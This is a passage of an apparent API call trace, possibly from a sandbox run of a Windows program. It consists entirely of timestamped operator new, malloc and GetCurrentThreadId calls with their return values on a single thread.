	[0050.032] ??2@YAPEAX_K@Z () returned 0x3cabe0
	[0050.032] malloc (_Size=0x80) returned 0x3c8af0
	[0050.108] GetCurrentThreadId () returned 0x9a8
	[0050.108] GetCurrentThreadId () returned 0x9a8
	[0050.108] ??2@YAPEAX_K@Z () returned 0x3cabe0
	[0050.108] malloc (_Size=0x80) returned 0x3c8b80
	[0050.114] GetCurrentThreadId () returned 0x9a8
	[0050.114] GetCurrentThreadId () returned 0x9a8
	[0050.114] ??2@YAPEAX_K@Z () returned 0x3cc0b0
	[0050.114] malloc (_Size=0x80) returned 0x3c8c10
	[0050.215] GetCurrentThreadId () returned 0x9a8
	[0050.216] GetCurrentThreadId () returned 0x9a8
	[0050.216] ??2@YAPEAX_K@Z () returned 0x3cabe0
	[0050.216] malloc (_Size=0x80) returned 0x3c8670
	[0050.220] GetCurrentThreadId () returned 0x9a8
	[0050.220] GetCurrentThreadId () returned 0x9a8
	[0050.220] ??2@YAPEAX_K@Z () returned 0x3cc0b0
	[0050.220] malloc (_Size=0x80) returned 0x3c8ca0
	[0050.308] GetCurrentThreadId () returned 0x9a8
	[0050.308] GetCurrentThreadId () returned 0x9a8
	[0050.308] ??2@YAPEAX_K@Z () returned 0x3cc0b0
	[0050.308] malloc (_Size=0x80) returned 0x3c8af0
	[0050.308] GetCurrentThreadId () returned 0x9a8
	[0050.308] GetCurrentThreadId () returned 0x9a8
	[0050.308] ??2@YAPEAX_K@Z () returned 0x3cc2b0
	[0050.308] malloc (_Size=0x80) returned 0x3c8940
	[0050.309] GetCurrentThreadId () returned 0x9a8
	[0050.309] GetCurrentThreadId () returned 0x9a8
	[0050.309] ??2@YAPEAX_K@Z () returned 0x3cc3b0
	[0050.309] malloc (_Size=0x80) returned 0x3c8d30
	[0050.350] GetCurrentThreadId () returned 0x9a8
	[0050.351] GetCurrentThreadId () returned 0x9a8
	[0050.351] ??2@YAPEAX_K@Z () returned 0x42eeb0
	[0050.351] malloc (_Size=0x80) returned 0x3c8a60
	[0050.363] GetCurrentThreadId () returned 0x9a8
	[0050.363] GetCurrentThreadId () returned 0x9a8
	[0050.363] ??2@YAPEAX_K@Z () returned 0x3caae0
	[0050.363] malloc (_Size=0x80) returned 0x3c8550
	[0050.368] GetCurrentThreadId () returned 0x9a8
	[0050.368] GetCurrentThreadId () returned 0x9a8
	[0050.368] ??2@YAPEAX_K@Z () returned 0x42eca0
	[0050.368] malloc (_Size=0x80) returned 0x3c89d0
	[0050.374] GetCurrentThreadId () returned 0x9a8
	[0050.374] GetCurrentThreadId () returned 0x9a8
	[0050.374] ??2@YAPEAX_K@Z () returned 0x3caae0
	[0050.374] malloc (_Size=0x80) returned 0x3c89d0
	[0050.473] GetCurrentThreadId () returned 0x9a8
	[0050.473] GetCurrentThreadId () returned 0x9a8
	[0050.474] ??2@YAPEAX_K@Z () returned 0x3cab50
	[0050.474] malloc (_Size=0x80) returned 0x3c89d0
	[0050.609] GetCurrentThreadId () returned 0x9a8
	[0050.609] GetCurrentThreadId () returned 0x9a8
	[0050.609] ??2@YAPEAX_K@Z () returned 0x3caae0
	[0050.609] malloc (_Size=0x80) returned 0x3c8a60
	[0051.032] GetCurrentThreadId () returned 0x9a8
	[0051.032] GetCurrentThreadId () returned 0x9a8
	[0051.032] ??2@YAPEAX_K@Z () returned 0x3cab50
	[0051.032] malloc (_Size=0x80) returned 0x3c8550
	[0051.041] GetCurrentThreadId () returned 0x9a8
	[0051.041] GetCurrentThreadId () returned 0x9a8
	[0051.041] ??2@YAPEAX_K@Z () returned 0x3cab50
	[0051.041] malloc (_Size=0x80) returned 0x3c8790
	[0051.048] GetCurrentThreadId () returned 0x9a8
	[0051.048] GetCurrentThreadId () returned 0x9a8
	[0051.048] ??2@YAPEAX_K@Z () returned 0x42eb30
	[0051.048] malloc (_Size=0x80) returned 0x3c8a60
	[0051.051] GetCurrentThreadId () returned 0x9a8
	[0051.051] GetCurrentThreadId () returned 0x9a8
	[0051.051] ??2@YAPEAX_K@Z () returned 0x42ec30
	[0051.051] malloc (_Size=0x80) returned 0x3c8820
	[0051.082] GetCurrentThreadId () returned 0x9a8
	[0051.082] GetCurrentThreadId () returned 0x9a8
	[0051.082] ??2@YAPEAX_K@Z () returned 0x42ec30
	[0051.082] malloc (_Size=0x80) returned 0x3c89d0
	[0051.082] GetCurrentThreadId () returned 0x9a8
	[0051.083] GetCurrentThreadId () returned 0x9a8
	[0051.083] ??2@YAPEAX_K@Z () returned 0x42ed30
	[0051.083] malloc (_Size=0x80) returned 0x3c8b80
	[0051.104] GetCurrentThreadId () returned 0x9a8
	[0051.104] GetCurrentThreadId () returned 0x9a8
	[0051.104] ??2@YAPEAX_K@Z () returned 0x3caae0
	[0051.104] malloc (_Size=0x80) returned 0x3c8550
	[0051.107] GetCurrentThreadId () returned 0x9a8
	[0051.107] GetCurrentThreadId () returned 0x9a8
	[0051.107] ??2@YAPEAX_K@Z () returned 0x3cabe0
	[0051.107] malloc (_Size=0x80) returned 0x3c89d0
	[0051.110] GetCurrentThreadId () returned 0x9a8
	[0051.110] GetCurrentThreadId () returned 0x9a8
	[0051.110] ??2@YAPEAX_K@Z () returned 0x3cab50
	[0051.110] malloc (_Size=0x80) returned 0x3c85e0
	[0051.110] GetCurrentThreadId () returned 0x9a8
	[0051.110] GetCurrentThreadId () returned 0x9a8
	[0051.110] ??2@YAPEAX_K@Z () returned 0x42ea30
	[0051.110] malloc (_Size=0x80) returned 0x3c8a60
	[0051.111] GetCurrentThreadId () returned 0x9a8
	[0051.111] GetCurrentThreadId () returned 0x9a8
	[0051.111] ??2@YAPEAX_K@Z () returned 0x42eb30
	[0051.111] malloc (_Size=0x80) returned 0x3c8820
	[0051.111] GetCurrentThreadId () returned 0x9a8
	[0051.112] GetCurrentThreadId () returned 0x9a8
	[0051.112] ??2@YAPEAX_K@Z () returned 0x42ecf0
	[0051.112] malloc (_Size=0x80) returned 0x3c8700
	[0051.113] GetCurrentThreadId () returned 0x9a8
	[0051.113] GetCurrentThreadId () returned 0x9a8
	[0051.113] ??2@YAPEAX_K@Z () returned 0x42eb30
	[0051.113] malloc (_Size=0x80) returned 0x3c8790
	[0051.116] GetCurrentThreadId () returned 0x9a8
	[0051.116] GetCurrentThreadId () returned 0x9a8
	[0051.116] ??2@YAPEAX_K@Z () returned 0x42ecd0
	[0051.117] malloc (_Size=0x80) returned 0x3c84c0
	[0051.117] GetCurrentThreadId () returned 0x9a8
	[0051.117] GetCurrentThreadId () returned 0x9a8
	[0051.117] ??2@YAPEAX_K@Z () returned 0x42ee70
	[0051.117] malloc (_Size=0x80) returned 0x3c8b80
	[0051.119] GetCurrentThreadId () returned 0x9a8
	[0051.119] GetCurrentThreadId () returned 0x9a8
	[0051.119] ??2@YAPEAX_K@Z () returned 0x3cab50
	[0051.119] malloc (_Size=0x80) returned 0x3c88b0
	[0051.120] GetCurrentThreadId () returned 0x9a8
	[0051.120] GetCurrentThreadId () returned 0x9a8
	[0051.120] ??2@YAPEAX_K@Z () returned 0x42ea30
	[0051.120] malloc (_Size=0x80) returned 0x3c8790
	[0051.128] GetCurrentThreadId () returned 0x9a8
	[0051.128] GetCurrentThreadId () returned 0x9a8
	[0051.128] ??2@YAPEAX_K@Z () returned 0x3caae0
	[0051.128] malloc (_Size=0x80) returned 0x3c8790
	[0051.129] GetCurrentThreadId () returned 0x9a8
	[0051.129] GetCurrentThreadId () returned 0x9a8
	[0051.129] ??2@YAPEAX_K@Z () returned 0x3cabe0
	[0051.129] malloc (_Size=0x80) returned 0x3c8820
	[0051.129] GetCurrentThreadId () returned 0x9a8
	[0051.129] GetCurrentThreadId () returned 0x9a8
	[0051.129] ??2@YAPEAX_K@Z () returned 0x42ea30
	[0051.129] malloc (_Size=0x80) returned 0x3c8430
	[0051.133] GetCurrentThreadId () returned 0x9a8
	[0051.133] GetCurrentThreadId () returned 0x9a8
	[0051.133] ??2@YAPEAX_K@Z () returned 0x3cab50
	[0051.133] malloc (_Size=0x80) returned 0x3c85e0
	[0051.134] GetCurrentThreadId () returned 0x9a8
	[0051.134] GetCurrentThreadId () returned 0x9a8
	[0051.134] ??2@YAPEAX_K@Z () returned 0x42ea30
	[0051.134] malloc (_Size=0x80) returned 0x3c8550
	[0051.134] GetCurrentThreadId () returned 0x9a8
	[0051.134] GetCurrentThreadId () returned 0x9a8
	[0051.134] ??2@YAPEAX_K@Z () returned 0x42eb30
	[0051.134] malloc (_Size=0x80) returned 0x3c8b80
	[0051.138] GetCurrentThreadId () returned 0x9a8
	[0051.138] GetCurrentThreadId () returned 0x9a8
	[0051.138] ??2@YAPEAX_K@Z () returned 0x42ecd0
	[0051.138] malloc (_Size=0x80) returned 0x3c89d0
	[0051.154] GetCurrentThreadId () returned 0x9a8
	[0051.155] GetCurrentThreadId () returned 0x9a8
	[0051.155] ??2@YAPEAX_K@Z () returned 0x42ecd0
	[0051.155] malloc (_Size=0x80) returned 0x3c8430
	[0051.165] GetCurrentThreadId () returned 0x9a8
	[0051.165] GetCurrentThreadId () returned 0x9a8
	[0051.165] ??2@YAPEAX_K@Z () returned 0x3caae0
	[0051.165] malloc (_Size=0x80) returned 0x3c88b0
	[0051.175] GetCurrentThreadId () returned 0x9a8
	[0051.175] GetCurrentThreadId () returned 0x9a8
	[0051.175] ??2@YAPEAX_K@Z () returned 0x3caae0
	[0051.175] malloc (_Size=0x80) returned 0x3c85e0
	[0051.191] GetCurrentThreadId () returned 0x9a8
	[0051.191] GetCurrentThreadId () returned 0x9a8
	[0051.191] ??2@YAPEAX_K@Z () returned 0x3caae0
	[0051.191] malloc (_Size=0x80) returned 0x3c8550
	[0051.197] GetCurrentThreadId () returned 0x9a8
	[0051.197] GetCurrentThreadId () returned 0x9a8
	[0051.197] ??2@YAPEAX_K@Z () returned 0x3caae0
	[0051.197] malloc (_Size=0x80) returned 0x3c88b0
	[0051.227] GetCurrentThreadId () returned 0x9a8
	[0051.227] GetCurrentThreadId () returned 0x9a8
	[0051.227] ??2@YAPEAX_K@Z () returned 0x3caae0
	[0051.227] malloc (_Size=0x80) returned 0x3c8790
	[0051.228] GetCurrentThreadId () returned 0x9a8
	[0051.228] GetCurrentThreadId () returned 0x9a8
	[0051.228] ??2@YAPEAX_K@Z () returned 0x42ea30
	[0051.228] malloc (_Size=0x80) returned 0x3c8820
	[0051.230] GetCurrentThreadId () returned 0x9a8
	[0051.230] GetCurrentThreadId () returned 0x9a8
	[0051.230] ??2@YAPEAX_K@Z () returned 0x42ea30
	[0051.230] malloc (_Size=0x80) returned 0x3c85e0
	[0051.233] GetCurrentThreadId () returned 0x9a8
	[0051.234] GetCurrentThreadId () returned 0x9a8
	[0051.234] ??2@YAPEAX_K@Z () returned 0x3caae0
	[0051.234] malloc (_Size=0x80) returned 0x3c8820
	[0051.236] GetCurrentThreadId () returned 0x9a8
	[0051.237] GetCurrentThreadId () returned 0x9a8
	[0051.237] ??2@YAPEAX_K@Z () returned 0x3caae0
	[0051.237] malloc (_Size=0x80) returned 0x3c8790
	[0051.241] GetCurrentThreadId () returned 0x9a8
	[0051.241] GetCurrentThreadId () returned 0x9a8
	[0051.241] ??2@YAPEAX_K@Z () returned 0x3cabe0
	[0051.241] malloc (_Size=0x80) returned 0x3c8550
	[0051.242] GetCurrentThreadId () returned 0x9a8
	[0051.242] GetCurrentThreadId () returned 0x9a8
	[0051.242] ??2@YAPEAX_K@Z () returned 0x42ea30
	[0051.242] malloc (_Size=0x80) returned 0x3c8700
	[0051.242] GetCurrentThreadId () returned 0x9a8
	[0051.242] GetCurrentThreadId () returned 0x9a8
	[0051.242] ??2@YAPEAX_K@Z () returned 0x42eb30
	[0051.242] malloc (_Size=0x80) returned 0x3c84c0
	[0051.275] GetCurrentThreadId () returned 0x9a8
	[0051.275] GetCurrentThreadId () returned 0x9a8
	[0051.275] ??2@YAPEAX_K@Z () returned 0x42ea30
	[0051.275] malloc (_Size=0x80) returned 0x3c84c0
	[0051.276] GetCurrentThreadId () returned 0x9a8
	[0051.276] GetCurrentThreadId () returned 0x9a8
	[0051.276] ??2@YAPEAX_K@Z () returned 0x42eb30
	[0051.276] malloc (_Size=0x80) returned 0x3c89d0
	[0051.337] GetCurrentThreadId () returned 0x9a8
	[0051.338] GetCurrentThreadId () returned 0x9a8
	[0051.338] ??2@YAPEAX_K@Z () returned 0x42eaa0
	[0051.338] malloc (_Size=0x80) returned 0x3c89d0
	[0051.338] GetCurrentThreadId () returned 0x9a8
	[0051.338] GetCurrentThreadId () returned 0x9a8
	[0051.338] ??2@YAPEAX_K@Z () returned 0x42eba0
	[0051.338] malloc (_Size=0x80) returned 0x3c8430
	[0051.394] GetCurrentThreadId () returned 0x9a8
	[0051.394] GetCurrentThreadId () returned 0x9a8
	[0051.394] ??2@YAPEAX_K@Z () returned 0x42ea30
	[0051.394] malloc (_Size=0x80) returned 0x3c8700
	[0051.394] GetCurrentThreadId () returned 0x9a8
	[0051.394] GetCurrentThreadId () returned 0x9a8
	[0051.395] ??2@YAPEAX_K@Z () returned 0x42eb30
	[0051.395] malloc (_Size=0x80) returned 0x3c8670
	[0051.417] GetCurrentThreadId () returned 0x9a8
	[0051.417] GetCurrentThreadId () returned 0x9a8
	[0051.417] ??2@YAPEAX_K@Z () returned 0x42ea30
	[0051.417] malloc (_Size=0x80) returned 0x3c8820
	[0051.436] GetCurrentThreadId () returned 0x9a8
	[0051.437] GetCurrentThreadId () returned 0x9a8
	[0051.437] ??2@YAPEAX_K@Z () returned 0x42ea30
	[0051.437] malloc (_Size=0x80) returned 0x3c89d0
	[0051.438] GetCurrentThreadId () returned 0x9a8
	[0051.438] GetCurrentThreadId () returned 0x9a8
	[0051.438] ??2@YAPEAX_K@Z () returned 0x42ebd0
	[0051.438] malloc (_Size=0x80) returned 0x3c8a60
	[0051.469] GetCurrentThreadId () returned 0x9a8
	[0051.469] GetCurrentThreadId () returned 0x9a8
	[0051.469] ??2@YAPEAX_K@Z () returned 0x42ea30
	[0051.469] malloc (_Size=0x80) returned 0x3c8a60
	[0051.469] GetCurrentThreadId () returned 0x9a8
	[0051.469] GetCurrentThreadId () returned 0x9a8
	[0051.469] ??2@YAPEAX_K@Z () returned 0x42eb30
	[0051.469] malloc (_Size=0x80) returned 0x3c8af0
	[0051.492] GetCurrentThreadId () returned 0x9a8
	[0051.492] GetCurrentThreadId () returned 0x9a8
	[0051.492] ??2@YAPEAX_K@Z () returned 0x42ea30
	[0051.492] malloc (_Size=0x80) returned 0x3c8670
	[0051.492] GetCurrentThreadId () returned 0x9a8
	[0051.492] GetCurrentThreadId () returned 0x9a8
	[0051.492] ??2@YAPEAX_K@Z () returned 0x42eb30
	[0051.493] malloc (_Size=0x80) returned 0x3c8b80
	[0051.500] GetCurrentThreadId () returned 0x9a8
	[0051.500] GetCurrentThreadId () returned 0x9a8
	[0051.500] ??2@YAPEAX_K@Z () returned 0x42ebd0
	[0051.500] malloc (_Size=0x80) returned 0x3c8af0
	[0051.513] GetCurrentThreadId () returned 0x9a8
	[0051.513] GetCurrentThreadId () returned 0x9a8
	[0051.513] ??2@YAPEAX_K@Z () returned 0x42ea30
	[0051.513] malloc (_Size=0x80) returned 0x3c8700
	[0051.513] GetCurrentThreadId () returned 0x9a8
	[0051.514] GetCurrentThreadId () returned 0x9a8
	[0051.514] ??2@YAPEAX_K@Z () returned 0x42eb30
	[0051.514] malloc (_Size=0x80) returned 0x3c89d0
	[0051.555] GetCurrentThreadId () returned 0x9a8
	[0051.555] GetCurrentThreadId () returned 0x9a8
	[0051.555] ??2@YAPEAX_K@Z () returned 0x42ebd0
	[0051.555] malloc (_Size=0x80) returned 0x3c8b80
	[0051.658] GetCurrentThreadId () returned 0x9a8
	[0051.658] GetCurrentThreadId () returned 0x9a8
	[0051.658] ??2@YAPEAX_K@Z () returned 0x3caae0
	[0051.658] malloc (_Size=0x80) returned 0x3c88b0
	[0051.658] GetCurrentThreadId () returned 0x9a8
	[0051.658] GetCurrentThreadId () returned 0x9a8
	[0051.658] ??2@YAPEAX_K@Z () returned 0x3e4000
	[0051.658] malloc (_Size=0x80) returned 0x3c8550
	[0051.660] GetCurrentThreadId () returned 0x9a8
	[0051.660] GetCurrentThreadId () returned 0x9a8
	[0051.660] ??2@YAPEAX_K@Z () returned 0x3e4100
	[0051.660] malloc (_Size=0x80) returned 0x3c8670
	[0051.662] GetCurrentThreadId () returned 0x9a8
	[0051.662] GetCurrentThreadId () returned 0x9a8
	[0051.662] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0051.662] malloc (_Size=0x80) returned 0x3c89d0
	[0051.705] GetCurrentThreadId () returned 0x9a8
	[0051.705] GetCurrentThreadId () returned 0x9a8
	[0051.705] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0051.705] malloc (_Size=0x80) returned 0x3c84c0
	[0051.751] GetCurrentThreadId () returned 0x9a8
	[0051.751] GetCurrentThreadId () returned 0x9a8
	[0051.751] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0051.751] malloc (_Size=0x80) returned 0x3c8820
	[0051.788] GetCurrentThreadId () returned 0x9a8
	[0051.788] GetCurrentThreadId () returned 0x9a8
	[0051.788] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0051.788] malloc (_Size=0x80) returned 0x3c8b80
	[0051.792] GetCurrentThreadId () returned 0x9a8
	[0051.792] GetCurrentThreadId () returned 0x9a8
	[0051.792] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0051.792] malloc (_Size=0x80) returned 0x3c8af0
	[0051.821] GetCurrentThreadId () returned 0x9a8
	[0051.821] GetCurrentThreadId () returned 0x9a8
	[0051.821] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0051.821] malloc (_Size=0x80) returned 0x3c84c0
	[0051.843] GetCurrentThreadId () returned 0x9a8
	[0051.843] GetCurrentThreadId () returned 0x9a8
	[0051.843] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0051.843] malloc (_Size=0x80) returned 0x3c8a60
	[0051.866] GetCurrentThreadId () returned 0x9a8
	[0051.866] GetCurrentThreadId () returned 0x9a8
	[0051.866] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0051.866] malloc (_Size=0x80) returned 0x3c85e0
	[0051.881] GetCurrentThreadId () returned 0x9a8
	[0051.881] GetCurrentThreadId () returned 0x9a8
	[0051.881] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0051.881] malloc (_Size=0x80) returned 0x3c8af0
	[0051.911] GetCurrentThreadId () returned 0x9a8
	[0051.911] GetCurrentThreadId () returned 0x9a8
	[0051.911] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0051.911] malloc (_Size=0x80) returned 0x3c84c0
	[0051.936] GetCurrentThreadId () returned 0x9a8
	[0051.936] GetCurrentThreadId () returned 0x9a8
	[0051.936] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0051.936] malloc (_Size=0x80) returned 0x3c8a60
	[0051.961] GetCurrentThreadId () returned 0x9a8
	[0051.961] GetCurrentThreadId () returned 0x9a8
	[0051.961] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0051.961] malloc (_Size=0x80) returned 0x3c85e0
	[0051.977] GetCurrentThreadId () returned 0x9a8
	[0051.978] GetCurrentThreadId () returned 0x9a8
	[0051.978] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0051.978] malloc (_Size=0x80) returned 0x3c8af0
	[0052.008] GetCurrentThreadId () returned 0x9a8
	[0052.008] GetCurrentThreadId () returned 0x9a8
	[0052.008] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0052.009] malloc (_Size=0x80) returned 0x3c84c0
	[0052.027] GetCurrentThreadId () returned 0x9a8
	[0052.027] GetCurrentThreadId () returned 0x9a8
	[0052.027] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0052.027] malloc (_Size=0x80) returned 0x3c8a60
	[0052.044] GetCurrentThreadId () returned 0x9a8
	[0052.044] GetCurrentThreadId () returned 0x9a8
	[0052.044] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0052.044] malloc (_Size=0x80) returned 0x3c85e0
	[0052.058] GetCurrentThreadId () returned 0x9a8
	[0052.058] GetCurrentThreadId () returned 0x9a8
	[0052.058] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0052.058] malloc (_Size=0x80) returned 0x3c8af0
	[0052.070] GetCurrentThreadId () returned 0x9a8
	[0052.070] GetCurrentThreadId () returned 0x9a8
	[0052.070] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0052.070] malloc (_Size=0x80) returned 0x3c84c0
	[0052.090] GetCurrentThreadId () returned 0x9a8
	[0052.090] GetCurrentThreadId () returned 0x9a8
	[0052.090] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0052.090] malloc (_Size=0x80) returned 0x3c8a60
	[0052.106] GetCurrentThreadId () returned 0x9a8
	[0052.106] GetCurrentThreadId () returned 0x9a8
	[0052.106] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0052.106] malloc (_Size=0x80) returned 0x3c85e0
	[0052.125] GetCurrentThreadId () returned 0x9a8
	[0052.125] GetCurrentThreadId () returned 0x9a8
	[0052.125] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0052.125] malloc (_Size=0x80) returned 0x3c8af0
	[0052.138] GetCurrentThreadId () returned 0x9a8
	[0052.138] GetCurrentThreadId () returned 0x9a8
	[0052.138] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0052.138] malloc (_Size=0x80) returned 0x3c84c0
	[0052.156] GetCurrentThreadId () returned 0x9a8
	[0052.156] GetCurrentThreadId () returned 0x9a8
	[0052.156] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0052.156] malloc (_Size=0x80) returned 0x3c8a60
	[0052.182] GetCurrentThreadId () returned 0x9a8
	[0052.182] GetCurrentThreadId () returned 0x9a8
	[0052.182] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0052.182] malloc (_Size=0x80) returned 0x3c85e0
	[0052.202] GetCurrentThreadId () returned 0x9a8
	[0052.202] GetCurrentThreadId () returned 0x9a8
	[0052.202] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0052.202] malloc (_Size=0x80) returned 0x3c8af0
	[0052.216] GetCurrentThreadId () returned 0x9a8
	[0052.216] GetCurrentThreadId () returned 0x9a8
	[0052.216] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0052.216] malloc (_Size=0x80) returned 0x3c84c0
	[0052.241] GetCurrentThreadId () returned 0x9a8
	[0052.241] GetCurrentThreadId () returned 0x9a8
	[0052.241] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0052.241] malloc (_Size=0x80) returned 0x3c8a60
	[0052.255] GetCurrentThreadId () returned 0x9a8
	[0052.255] GetCurrentThreadId () returned 0x9a8
	[0052.255] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0052.255] malloc (_Size=0x80) returned 0x3c85e0
	[0052.270] GetCurrentThreadId () returned 0x9a8
	[0052.270] GetCurrentThreadId () returned 0x9a8
	[0052.271] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0052.271] malloc (_Size=0x80) returned 0x3c8af0
	[0052.296] GetCurrentThreadId () returned 0x9a8
	[0052.296] GetCurrentThreadId () returned 0x9a8
	[0052.296] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0052.296] malloc (_Size=0x80) returned 0x3c84c0
	[0052.312] GetCurrentThreadId () returned 0x9a8
	[0052.312] GetCurrentThreadId () returned 0x9a8
	[0052.312] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0052.312] malloc (_Size=0x80) returned 0x3c8a60
	[0052.312] GetCurrentThreadId () returned 0x9a8
	[0052.312] GetCurrentThreadId () returned 0x9a8
	[0052.312] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0052.312] malloc (_Size=0x80) returned 0x3c85e0
	[0052.315] GetCurrentThreadId () returned 0x9a8
	[0052.315] GetCurrentThreadId () returned 0x9a8
	[0052.315] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0052.315] malloc (_Size=0x80) returned 0x3c8af0
	[0052.320] GetCurrentThreadId () returned 0x9a8
	[0052.320] GetCurrentThreadId () returned 0x9a8
	[0052.320] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0052.320] malloc (_Size=0x80) returned 0x3c8430
	[0052.472] GetCurrentThreadId () returned 0x9a8
	[0052.472] GetCurrentThreadId () returned 0x9a8
	[0052.472] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0052.472] malloc (_Size=0x80) returned 0x3c8430
	[0052.559] GetCurrentThreadId () returned 0x9a8
	[0052.559] GetCurrentThreadId () returned 0x9a8
	[0052.559] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0052.559] malloc (_Size=0x80) returned 0x3c8820
	[0052.623] GetCurrentThreadId () returned 0x9a8
	[0052.623] GetCurrentThreadId () returned 0x9a8
	[0052.624] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0052.624] malloc (_Size=0x80) returned 0x3c8a60
	[0052.795] GetCurrentThreadId () returned 0x9a8
	[0052.795] GetCurrentThreadId () returned 0x9a8
	[0052.795] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0052.795] malloc (_Size=0x80) returned 0x3c8700
	[0052.810] GetCurrentThreadId () returned 0x9a8
	[0052.810] GetCurrentThreadId () returned 0x9a8
	[0052.810] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0052.811] malloc (_Size=0x80) returned 0x3c8af0
	[0052.902] GetCurrentThreadId () returned 0x9a8
	[0052.902] GetCurrentThreadId () returned 0x9a8
	[0052.902] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0052.902] malloc (_Size=0x80) returned 0x3c85e0
	[0052.902] GetCurrentThreadId () returned 0x9a8
	[0052.902] GetCurrentThreadId () returned 0x9a8
	[0052.903] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0052.903] malloc (_Size=0x80) returned 0x3c8940
	[0052.988] GetCurrentThreadId () returned 0x9a8
	[0052.988] GetCurrentThreadId () returned 0x9a8
	[0052.988] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0052.988] malloc (_Size=0x80) returned 0x3c8430
	[0052.989] GetCurrentThreadId () returned 0x9a8
	[0052.990] GetCurrentThreadId () returned 0x9a8
	[0052.990] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0052.990] malloc (_Size=0x80) returned 0x3c8b80
	[0052.991] GetCurrentThreadId () returned 0x9a8
	[0052.991] GetCurrentThreadId () returned 0x9a8
	[0052.991] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0052.991] malloc (_Size=0x80) returned 0x3c84c0
	[0053.022] GetCurrentThreadId () returned 0x9a8
	[0053.022] GetCurrentThreadId () returned 0x9a8
	[0053.022] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0053.022] malloc (_Size=0x80) returned 0x3c8700
	[0053.061] GetCurrentThreadId () returned 0x9a8
	[0053.062] GetCurrentThreadId () returned 0x9a8
	[0053.062] ??2@YAPEAX_K@Z () returned 0x3e4000
	[0053.062] malloc (_Size=0x80) returned 0x3c8790
	[0053.062] GetCurrentThreadId () returned 0x9a8
	[0053.062] GetCurrentThreadId () returned 0x9a8
	[0053.062] ??2@YAPEAX_K@Z () returned 0x3e4100
	[0053.062] malloc (_Size=0x80) returned 0x3c8a60
	[0053.063] GetCurrentThreadId () returned 0x9a8
	[0053.063] GetCurrentThreadId () returned 0x9a8
	[0053.063] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0053.063] malloc (_Size=0x80) returned 0x3c89d0
	[0053.096] GetCurrentThreadId () returned 0x9a8
	[0053.096] GetCurrentThreadId () returned 0x9a8
	[0053.096] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0053.096] malloc (_Size=0x80) returned 0x3c8700
	[0053.102] GetCurrentThreadId () returned 0x9a8
	[0053.102] GetCurrentThreadId () returned 0x9a8
	[0053.102] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0053.102] malloc (_Size=0x80) returned 0x3c8670
	[0053.122] GetCurrentThreadId () returned 0x9a8
	[0053.122] GetCurrentThreadId () returned 0x9a8
	[0053.122] ??2@YAPEAX_K@Z () returned 0x3e4100
	[0053.122] malloc (_Size=0x80) returned 0x3c8700
	[0053.130] GetCurrentThreadId () returned 0x9a8
	[0053.130] GetCurrentThreadId () returned 0x9a8
	[0053.130] ??2@YAPEAX_K@Z () returned 0x3e4100
	[0053.130] malloc (_Size=0x80) returned 0x3c83a0
	[0053.135] GetCurrentThreadId () returned 0x9a8
	[0053.135] GetCurrentThreadId () returned 0x9a8
	[0053.135] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0053.135] malloc (_Size=0x80) returned 0x3c8820
	[0053.151] GetCurrentThreadId () returned 0x9a8
	[0053.151] GetCurrentThreadId () returned 0x9a8
	[0053.151] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0053.151] malloc (_Size=0x80) returned 0x3c8a60
	[0053.170] GetCurrentThreadId () returned 0x9a8
	[0053.170] GetCurrentThreadId () returned 0x9a8
	[0053.170] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0053.170] malloc (_Size=0x80) returned 0x3c8430
	[0053.171] GetCurrentThreadId () returned 0x9a8
	[0053.171] GetCurrentThreadId () returned 0x9a8
	[0053.171] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0053.171] malloc (_Size=0x80) returned 0x3c89d0
	[0053.173] GetCurrentThreadId () returned 0x9a8
	[0053.173] GetCurrentThreadId () returned 0x9a8
	[0053.173] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0053.173] malloc (_Size=0x80) returned 0x3c8670
	[0053.181] GetCurrentThreadId () returned 0x9a8
	[0053.181] GetCurrentThreadId () returned 0x9a8
	[0053.181] ??2@YAPEAX_K@Z () returned 0x3e4200
